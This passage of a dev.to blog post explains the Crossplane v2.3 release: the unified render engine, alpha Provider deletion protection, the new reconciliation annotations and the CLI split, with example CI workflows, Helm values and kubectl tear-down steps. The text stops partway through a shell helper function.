      <title>Crossplane v2.3 Deep Dive — High-Fidelity Render Engine, Provider Deletion Protection, Reconciliation Annotations, and CLI Separation</title>
      <dc:creator>daniel jeong</dc:creator>
      <pubDate>Wed, 27 May 2026 00:42:22 +0000</pubDate>
      <link>https://dev.to/x4nent/crossplane-v23-deep-dive-high-fidelity-render-engine-provider-deletion-protection-1j4j</link>
      <guid>https://dev.to/x4nent/crossplane-v23-deep-dive-high-fidelity-render-engine-provider-deletion-protection-1j4j</guid>
      <description>&lt;h1&gt;
  
  
  Crossplane v2.3 Deep Dive — High-Fidelity Render Engine, Provider Deletion Protection, Reconciliation Annotations, and CLI Separation Redefining the 2026 Kubernetes Control Plane
&lt;/h1&gt;

&lt;p&gt;On &lt;strong&gt;May 21, 2026&lt;/strong&gt;, the Crossplane maintainers shipped &lt;strong&gt;v2.3.0&lt;/strong&gt;, the quarterly release that — for the first time in the v2 series — turned the "production-grade control plane" pitch into measurable operational evidence. v2.0 brought the big architectural earthquake (namespaced XRs and MRs, composing &lt;em&gt;any&lt;/em&gt; resource, Operations), v2.1/v2.2 made it run, and &lt;strong&gt;v2.3 closes the long-standing day-2 gaps&lt;/strong&gt; that platform teams have been quietly working around for years.&lt;/p&gt;

&lt;p&gt;Six changes carry the release:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;High-Fidelity Render Engine&lt;/strong&gt; — &lt;code&gt;crossplane render&lt;/code&gt; now drives the real in-cluster composite reconciler via a hidden &lt;code&gt;crossplane internal render&lt;/code&gt; subcommand, instead of a parallel reimplementation.&lt;/li&gt;
&lt;li&gt;Alpha &lt;strong&gt;Provider Deletion Protection&lt;/strong&gt; — Crossplane auto-creates &lt;code&gt;ClusterUsage&lt;/code&gt; resources that block Provider deletion through the existing Usage webhook while managed resources of that Provider's kinds still exist.&lt;/li&gt;
&lt;li&gt;Two new &lt;strong&gt;reconciliation annotations&lt;/strong&gt; — &lt;code&gt;crossplane.io/poll-interval&lt;/code&gt; overrides the controller-level poll interval per-resource, and &lt;code&gt;crossplane.io/reconcile-requested-at&lt;/code&gt; triggers an immediate reconcile whenever the value changes.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;XR Circuit Breaker reset&lt;/strong&gt; — when an XR is deleted, its circuit-breaker state is now discarded so a same-named replacement starts clean.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;No-op status update skip&lt;/strong&gt; for &lt;code&gt;CompositionRevision&lt;/code&gt; and composite reconcilers, behind the alpha gate &lt;code&gt;--enable-no-op-status-update-skip&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Crossplane CLI repository split&lt;/strong&gt; — the CLI moves to its own repository (&lt;code&gt;crossplane/crossplane-cli&lt;/code&gt;) with an independent release cadence.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;This article unpacks each of the six changes at the level of code paths and alpha gate flags, and lays out the staged upgrade/observation/rollback workflow we used at ManoIT across three control planes (prod/stage/dev).&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Disclosure&lt;/strong&gt;: cross-posted from the &lt;a href="https://www.manoit.co.kr/forum/view/1478693" rel="noopener noreferrer"&gt;ManoIT tech blog&lt;/a&gt;. Original (Korean) published 2026-05-27. AI-assisted authoring with editorial review.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  1. Why May 21, 2026 Is a Crossplane Inflection Point
&lt;/h2&gt;

&lt;p&gt;Crossplane was open-sourced by Upbound in &lt;strong&gt;December 2018&lt;/strong&gt;, joined the CNCF as a Sandbox project in 2020, became Incubating in 2021, and was &lt;strong&gt;promoted to CNCF Graduated on October 28, 2025&lt;/strong&gt;. The identity drift between v1 ("Kubernetes-native IaC, a Terraform alternative") and v2 ("a control-plane SDK on top of the Kubernetes API") matters because it changes how you should read the v2.3 release notes.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Date&lt;/th&gt;
&lt;th&gt;Event&lt;/th&gt;
&lt;th&gt;Operational meaning&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;2018-12&lt;/td&gt;
&lt;td&gt;Upbound open-sources Crossplane&lt;/td&gt;
&lt;td&gt;"IaC on Kubernetes" vision begins&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2020-09&lt;/td&gt;
&lt;td&gt;CNCF Sandbox accepted&lt;/td&gt;
&lt;td&gt;Community governance, stage 1&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2021-09&lt;/td&gt;
&lt;td&gt;CNCF Incubating&lt;/td&gt;
&lt;td&gt;Production-use accumulation phase&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2024-05&lt;/td&gt;
&lt;td&gt;v1.17 — native patch &amp;amp; transform deprecated&lt;/td&gt;
&lt;td&gt;Composition Function era declared&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2025-07&lt;/td&gt;
&lt;td&gt;v2.0 — namespaced XR/MR, Operations alpha, compose any resource&lt;/td&gt;
&lt;td&gt;Identity shift to "control-plane SDK"&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2025-10-28&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;CNCF Graduated&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Enterprise adoption guidance formalized&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2025-11&lt;/td&gt;
&lt;td&gt;v2.1 — namespaced MR stable, MRD alpha&lt;/td&gt;
&lt;td&gt;Selective resource activation for large Providers&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2026-03&lt;/td&gt;
&lt;td&gt;v2.2 — Pipeline Inspector, RequiredSchemas, ImageConfig, XRD CEL validation&lt;/td&gt;
&lt;td&gt;Composition Function debugging/validation gaps closed&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;2026-05-21&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;v2.3 — Render Engine unification, Provider deletion protection, reconcile annotations ×2, CLI split&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Local ↔ cluster gap removed; operational safety net hardened&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2027-02&lt;/td&gt;
&lt;td&gt;v2.3 EOL planned&lt;/td&gt;
&lt;td&gt;Quarterly release + 9-month support window maintained&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Two operational headlines:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;The long-standing "renders locally, fails in cluster" problem is structurally gone&lt;/strong&gt;: the maintainers retired the parallel reconciler used by &lt;code&gt;crossplane render&lt;/code&gt; and now expose the real composite reconciler as the hidden &lt;code&gt;crossplane internal render&lt;/code&gt; subcommand, which &lt;code&gt;crossplane render&lt;/code&gt; (and downstream tools like &lt;code&gt;crossplane-diff&lt;/code&gt;) calls.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Two new alpha gates (&lt;code&gt;--enable-provider-deletion-protection&lt;/code&gt;, &lt;code&gt;--enable-no-op-status-update-skip&lt;/code&gt;) close the operational safety-net gap as soon as you opt in&lt;/strong&gt;: accidental Provider deletion is a well-known way for Crossplane operators to orphan MRs, and skipping no-op status updates removes etcd writes whose volume otherwise grows linearly with cluster size.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  2. High-Fidelity Render Engine — Removing the Local Render ↔ Cluster Reconcile Gap
&lt;/h2&gt;

&lt;p&gt;The biggest maintainer-side work in v2.3 happened where you couldn't see it. &lt;code&gt;crossplane render&lt;/code&gt; has, since the v1 days, been the way to preview how an XR resolves through a Composition Function pipeline. The catch: the reconciler that &lt;code&gt;render&lt;/code&gt; used was a &lt;strong&gt;structurally separate reimplementation&lt;/strong&gt; of what the in-cluster composite controller actually ran.&lt;/p&gt;

&lt;h3&gt;
  
  
  2.1 The Two-Reconciler Gap Through v2.2
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Axis&lt;/th&gt;
&lt;th&gt;Local &lt;code&gt;render&lt;/code&gt; (v2.2)&lt;/th&gt;
&lt;th&gt;In-cluster controller (v2.2)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Reconciler implementation&lt;/td&gt;
&lt;td&gt;Render-only reimplementation&lt;/td&gt;
&lt;td&gt;Official &lt;code&gt;composite&lt;/code&gt; package implementation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Pipeline step context&lt;/td&gt;
&lt;td&gt;Partial propagation&lt;/td&gt;
&lt;td&gt;Full propagation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Required Resources/Schemas&lt;/td&gt;
&lt;td&gt;Partial in local&lt;/td&gt;
&lt;td&gt;Full RequiredSchemas since v2.2&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Managed metadata (labels, owner refs)&lt;/td&gt;
&lt;td&gt;Some missing post-render&lt;/td&gt;
&lt;td&gt;Attached as actually applied&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Downstream tools (&lt;code&gt;crossplane-diff&lt;/code&gt;)&lt;/td&gt;
&lt;td&gt;Inherited the gap through &lt;code&gt;render&lt;/code&gt; output&lt;/td&gt;
&lt;td&gt;—&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;"Works locally, breaks in cluster" issues&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Frequent&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;—&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  2.2 The v2.3 Fix — Share Code via &lt;code&gt;crossplane internal render&lt;/code&gt;
&lt;/h3&gt;

&lt;p&gt;v2.3 exposes the in-cluster composite reconciler as a callable subcommand. The new name is &lt;code&gt;crossplane internal render&lt;/code&gt; — the "internal" prefix is deliberate: it's a backend for other tools, not a user-facing command. &lt;code&gt;crossplane render&lt;/code&gt; now calls this backend, so local output goes through the exact same code path as the cluster.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# v2.3: crossplane render now invokes the same composite reconciler internally&lt;/span&gt;
crossplane render &lt;span class="se"&gt;\&lt;/span&gt;
  examples/xr.yaml &lt;span class="se"&gt;\&lt;/span&gt;
  examples/composition.yaml &lt;span class="se"&gt;\&lt;/span&gt;
  examples/functions.yaml &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--include-full-xr&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--include-context&lt;/span&gt;

&lt;span class="c"&gt;# You can now 1:1 compare the local output to what the controller produces in cluster&lt;/span&gt;
kubectl get app my-app &lt;span class="nt"&gt;-o&lt;/span&gt; yaml &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; cluster.yaml
crossplane render examples/xr.yaml examples/composition.yaml examples/functions.yaml &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; local.yaml
diff cluster.yaml local.yaml   &lt;span class="c"&gt;# Note: post-v2.3, substantive diff is 0 modulo metadata/status&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The downstream impact is large. &lt;code&gt;crossplane-diff&lt;/code&gt;, &lt;code&gt;crossplane-test&lt;/code&gt;, and every CI workflow that validates compositions on PRs were all subject to the same gap, so v2.3 removes one whole class of "PR was green, merge broke prod" incident.&lt;/p&gt;

&lt;h3&gt;
  
  
  2.3 Operational Application — Render-vs-Cluster Diff Gate in CI
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# .github/workflows/crossplane-composition-check.yml&lt;/span&gt;
&lt;span class="c1"&gt;# Note: pre-v2.3, this comparison is meaningless because of the render gap&lt;/span&gt;
&lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Crossplane Composition Drift Gate&lt;/span&gt;
&lt;span class="na"&gt;on&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;pull_request&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;paths&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;compositions/**"&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;xrs/**"&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;functions/**"&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;

&lt;span class="na"&gt;jobs&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;drift-gate&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;runs-on&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ubuntu-24.04&lt;/span&gt;
    &lt;span class="na"&gt;steps&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;actions/checkout@v5&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Install Crossplane CLI v2.3.0&lt;/span&gt;
        &lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
          &lt;span class="s"&gt;curl -sSL "https://releases.crossplane.io/stable/v2.3.0/bin/linux_amd64/crossplane" -o crossplane&lt;/span&gt;
          &lt;span class="s"&gt;install -m 0755 crossplane /usr/local/bin/crossplane&lt;/span&gt;
          &lt;span class="s"&gt;crossplane version --client   # client: 2.3.0&lt;/span&gt;

      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Render with Composition Function pipeline&lt;/span&gt;
        &lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
          &lt;span class="s"&gt;# High-Fidelity Render — same code path as in-cluster controller&lt;/span&gt;
          &lt;span class="s"&gt;crossplane render \&lt;/span&gt;
            &lt;span class="s"&gt;xrs/${{ matrix.xr }}.yaml \&lt;/span&gt;
            &lt;span class="s"&gt;compositions/${{ matrix.composition }}.yaml \&lt;/span&gt;
            &lt;span class="s"&gt;functions/index.yaml \&lt;/span&gt;
            &lt;span class="s"&gt;--include-full-xr \&lt;/span&gt;
            &lt;span class="s"&gt;--include-context \&lt;/span&gt;
            &lt;span class="s"&gt;-o yaml &amp;gt; rendered.yaml&lt;/span&gt;

      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Fetch live cluster state (prod read-only)&lt;/span&gt;
        &lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
          &lt;span class="s"&gt;kubectl --context prod-ro get $(yq '.kind' rendered.yaml) \&lt;/span&gt;
            &lt;span class="s"&gt;$(yq '.metadata.name' rendered.yaml) -o yaml \&lt;/span&gt;
            &lt;span class="s"&gt;| yq 'del(.metadata.managedFields, .metadata.resourceVersion, .metadata.uid, .status)' \&lt;/span&gt;
            &lt;span class="s"&gt;&amp;gt; cluster.yaml&lt;/span&gt;

      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Diff and fail on unexpected drift&lt;/span&gt;
        &lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
          &lt;span class="s"&gt;diff -u cluster.yaml rendered.yaml || {&lt;/span&gt;
            &lt;span class="s"&gt;echo "::error::Composition output diverges from cluster — review before merge"&lt;/span&gt;
            &lt;span class="s"&gt;exit 1&lt;/span&gt;
          &lt;span class="s"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  3. Alpha Provider Deletion Protection — Auto ClusterUsage + Usage Webhook
&lt;/h2&gt;

&lt;p&gt;The second change targets the highest-frequency operator incident: &lt;strong&gt;"I accidentally deleted a Provider and every MR of its kinds was orphaned."&lt;/strong&gt; Every Crossplane operator has either lived this or heard the story.&lt;/p&gt;

&lt;h3&gt;
  
  
  3.1 The Existing Usage Webhook's Limitation — XR/MR Level Only
&lt;/h3&gt;

&lt;p&gt;Crossplane has shipped the &lt;code&gt;Usage&lt;/code&gt; resource since v1.14 (initially as an alpha feature) to express "while resource B uses resource A, refuse to delete A." A ValidatingAdmissionWebhook intercepts DELETE requests and rejects them if a &lt;code&gt;Usage&lt;/code&gt; still names a live dependency. The problem: &lt;strong&gt;Provider packages themselves had no equivalent guard&lt;/strong&gt;. One &lt;code&gt;kubectl delete provider provider-aws&lt;/code&gt; would strand every MR of every kind that Provider defined.&lt;/p&gt;

&lt;h3&gt;
  
  
  3.2 v2.3 — Auto-Create &lt;code&gt;ClusterUsage&lt;/code&gt; to Block Provider DELETE
&lt;/h3&gt;

&lt;p&gt;v2.3 introduces the alpha gate &lt;code&gt;--enable-provider-deletion-protection&lt;/code&gt;. When the gate is enabled, Crossplane protects each Provider as follows:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Step&lt;/th&gt;
&lt;th&gt;Action&lt;/th&gt;
&lt;th&gt;Implementation&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;On Provider install, create a &lt;code&gt;ClusterUsage&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Provider controller creates &lt;code&gt;kind: ClusterUsage&lt;/code&gt; at bootstrap, &lt;code&gt;spec.of&lt;/code&gt; points to the Provider itself&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;While MRs of that Provider's kinds exist, mark &lt;code&gt;ClusterUsage&lt;/code&gt; Active&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;spec.by&lt;/code&gt; selector auto-maps to the Provider's CRD labels&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;Provider DELETE intercepted by Usage webhook&lt;/td&gt;
&lt;td&gt;Reuses the existing Usage webhook code path&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;DELETE allowed only when active MRs = 0&lt;/td&gt;
&lt;td&gt;Otherwise the webhook denies the request with a human-readable message&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;Provider tear-down requires explicit opt-out&lt;/td&gt;
&lt;td&gt;Operator clears all MRs, then &lt;code&gt;kubectl delete clusterusage protect-provider-aws-...&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  3.3 Turning It On — Helm Values + Gate Flag
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# helm/crossplane-values.yaml&lt;/span&gt;
&lt;span class="c1"&gt;# Note: alpha feature — verify for 1 week in staging before production&lt;/span&gt;
&lt;span class="na"&gt;crossplane&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;args&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;--debug&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;--enable-environment-configs&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;--enable-operations&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;--enable-provider-deletion-protection&lt;/span&gt;   &lt;span class="c1"&gt;# v2.3 alpha gate&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;--enable-no-op-status-update-skip&lt;/span&gt;       &lt;span class="c1"&gt;# v2.3 alpha — cut ETCD writes&lt;/span&gt;
  &lt;span class="na"&gt;resourcesCrossplane&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;limits&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;cpu&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;500m"&lt;/span&gt;
      &lt;span class="na"&gt;memory&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;1Gi"&lt;/span&gt;
    &lt;span class="na"&gt;requests&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;cpu&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;100m"&lt;/span&gt;
      &lt;span class="na"&gt;memory&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;256Mi"&lt;/span&gt;
  &lt;span class="na"&gt;metrics&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;enabled&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;   &lt;span class="c1"&gt;# Prometheus scraping recommended&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Verify after enable&lt;/span&gt;
helm upgrade crossplane crossplane-stable/crossplane &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--version&lt;/span&gt; 2.3.0 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--namespace&lt;/span&gt; crossplane-system &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-f&lt;/span&gt; helm/crossplane-values.yaml

&lt;span class="c"&gt;# ClusterUsage is auto-created on Provider install&lt;/span&gt;
kubectl get clusterusage
&lt;span class="c"&gt;# NAME                              OF                       BY                 AGE&lt;/span&gt;
&lt;span class="c"&gt;# protect-provider-aws-12fa3        provider-aws             provider-aws-mrs   1m&lt;/span&gt;

&lt;span class="c"&gt;# Intentional delete attempt — refused&lt;/span&gt;
kubectl delete provider provider-aws
&lt;span class="c"&gt;# Error from server (Forbidden): admission webhook "no-usages.apiextensions.crossplane.io" denied the request:&lt;/span&gt;
&lt;span class="c"&gt;# this provider is in-use by 247 managed resources of 12 kinds: cannot delete&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
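&lt;p&gt;Helm silently ignores values under keys the chart does not read, so it is worth confirming that the alpha flags actually reached the running Deployment. A minimal sketch, assuming &lt;code&gt;kubectl ... -o jsonpath='{.spec.template.spec.containers[0].args}'&lt;/code&gt; prints the args as a JSON string array (for example &lt;code&gt;["--debug","--enable-operations"]&lt;/code&gt;); &lt;code&gt;gate_enabled&lt;/code&gt; is a hypothetical helper name, not part of any Crossplane tooling.&lt;/p&gt;

```shell
#!/usr/bin/env bash
# gate_enabled FLAG
# Reads a JSON string array of container args on stdin, e.g.
#   ["--debug","--enable-provider-deletion-protection"]
# and succeeds only if FLAG is one of the elements (exact, whole-arg match).
gate_enabled() {
  local flag=$1
  # Strip brackets, quotes and spaces, put one arg per line, then match whole lines.
  sed -e 's/[][" ]//g' | tr ',' '\n' | grep -qxF -- "$flag"
}

# Usage against a live cluster (hypothetical check; adjust names to your install):
#   kubectl -n crossplane-system get deploy crossplane \
#     -o jsonpath='{.spec.template.spec.containers[0].args}' \
#     | gate_enabled --enable-provider-deletion-protection \
#     || echo "deletion-protection gate is NOT active"
```

&lt;p&gt;Matching whole lines with &lt;code&gt;grep -x&lt;/code&gt; keeps a flag from matching a longer flag that merely starts with the same text.&lt;/p&gt;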



&lt;h3&gt;
  
  
  3.4 Standard Tear-Down Workflow
&lt;/h3&gt;

&lt;p&gt;With the alpha gate on, a Provider can no longer be removed casually, so you need a deliberate tear-down procedure. Our ManoIT standard:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Step 1: inventory every MR of the Provider&lt;/span&gt;
kubectl get &lt;span class="si"&gt;$(&lt;/span&gt;kubectl api-resources &lt;span class="nt"&gt;--api-group&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;aws.upbound.io &lt;span class="nt"&gt;-o&lt;/span&gt; name | &lt;span class="nb"&gt;paste&lt;/span&gt; &lt;span class="nt"&gt;-sd&lt;/span&gt;, -&lt;span class="si"&gt;)&lt;/span&gt; &lt;span class="nt"&gt;-A&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-o&lt;/span&gt; &lt;span class="nv"&gt;jsonpath&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'{range .items[*]}{.kind}{"\t"}{.metadata.namespace}{"/"}{.metadata.name}{"\n"}{end}'&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; aws-mrs-inventory.tsv

&lt;span class="c"&gt;# Step 2: decide deletionPolicy=Orphan or proper delete, apply in bulk&lt;/span&gt;
xargs &lt;span class="nt"&gt;-a&lt;/span&gt; aws-mrs-inventory.tsv &lt;span class="nt"&gt;-I&lt;/span&gt;&lt;span class="o"&gt;{}&lt;/span&gt; kubectl patch &lt;span class="o"&gt;{}&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--type&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;merge &lt;span class="nt"&gt;-p&lt;/span&gt; &lt;span class="s1"&gt;'{"spec":{"deletionPolicy":"Orphan"}}'&lt;/span&gt;

&lt;span class="c"&gt;# Step 3: delete all MRs — ClusterUsage auto-transitions to Inactive&lt;/span&gt;
xargs &lt;span class="nt"&gt;-a&lt;/span&gt; aws-mrs-inventory.tsv &lt;span class="nt"&gt;-I&lt;/span&gt;&lt;span class="o"&gt;{}&lt;/span&gt; kubectl delete &lt;span class="o"&gt;{}&lt;/span&gt;
kubectl get clusterusage protect-provider-aws-12fa3 &lt;span class="nt"&gt;-o&lt;/span&gt; yaml | yq &lt;span class="s1"&gt;'.status.conditions[0].reason'&lt;/span&gt;
&lt;span class="c"&gt;# Inactive&lt;/span&gt;

&lt;span class="c"&gt;# Step 4: remove ClusterUsage → Provider delete now allowed&lt;/span&gt;
kubectl delete clusterusage protect-provider-aws-12fa3
kubectl delete provider provider-aws
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
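&lt;p&gt;Before Step 4 it helps to know how many MRs are still left, in the same shape the webhook reports them (N managed resources of K kinds). A minimal sketch, assuming an inventory file with one MR per line and the resource type in the first whitespace-separated field, as the Step 1 inventory produces; &lt;code&gt;summarize_inventory&lt;/code&gt; is a hypothetical helper.&lt;/p&gt;

```shell
#!/usr/bin/env bash
# summarize_inventory FILE
# Counts MRs (non-empty lines) and distinct resource types (field 1) in FILE,
# then prints a verdict using the rule from the table above: the Provider
# may be deleted only when zero MRs remain. Exit status 0 means "OK".
summarize_inventory() {
  awk '
    NF {
      total++
      if (!($1 in seen)) { seen[$1] = 1; kinds++ }
    }
    END {
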